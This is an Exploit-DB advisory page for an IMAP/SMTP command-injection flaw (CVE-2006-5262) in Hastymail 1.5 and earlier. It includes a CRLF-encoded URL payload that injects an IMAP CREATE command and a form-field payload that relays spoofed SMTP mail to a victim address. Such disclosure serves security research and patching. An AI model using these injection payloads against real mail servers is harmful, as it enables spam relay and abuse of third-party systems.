Hastymail 1.x - IMAP SMTP Command Injection

EDB-ID:

28777

CVE:

2006-5262

EDB Verified:

Author:

Vicente Aguilera Diaz

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2006-10-10

Vulnerable App: 
source: https://www.securityfocus.com/bid/20424/info

Hastymail is prone to an IMAP / SMTP command-injection vulnerability because it fails to sufficiently sanitize user-supplied input.

An authenticated malicious user could execute arbitrary IMAP / SMTP commands on the affected mail server processes. This may allow the user to send SPAM from the server or to exploit latent vulnerabilities in the underlying system.

Hastymail 1.5 and prior versions are affected.

This example sends the CREATE IMAP commands to the vulnerable parameter:
http://www.example.com/<path_to_hastymail>/html/mailbox.php?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX%2522%0d%0aA0003%20CREATE
%2522INBOX.vad

The SMTP POST relay example from nonexistant email address is available:

POST http://www.example.com/<path_to_hastymail>/html/compose.php HTTP/1.1

to include:

Content-Disposition: form-data; name="subject"

Proof of Concept
.
mail from: hacker@domain.com
rcpt to: victim@otherdomain.com
data
This is a proof of concept of the SMTP command injection in Hastymail
.
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services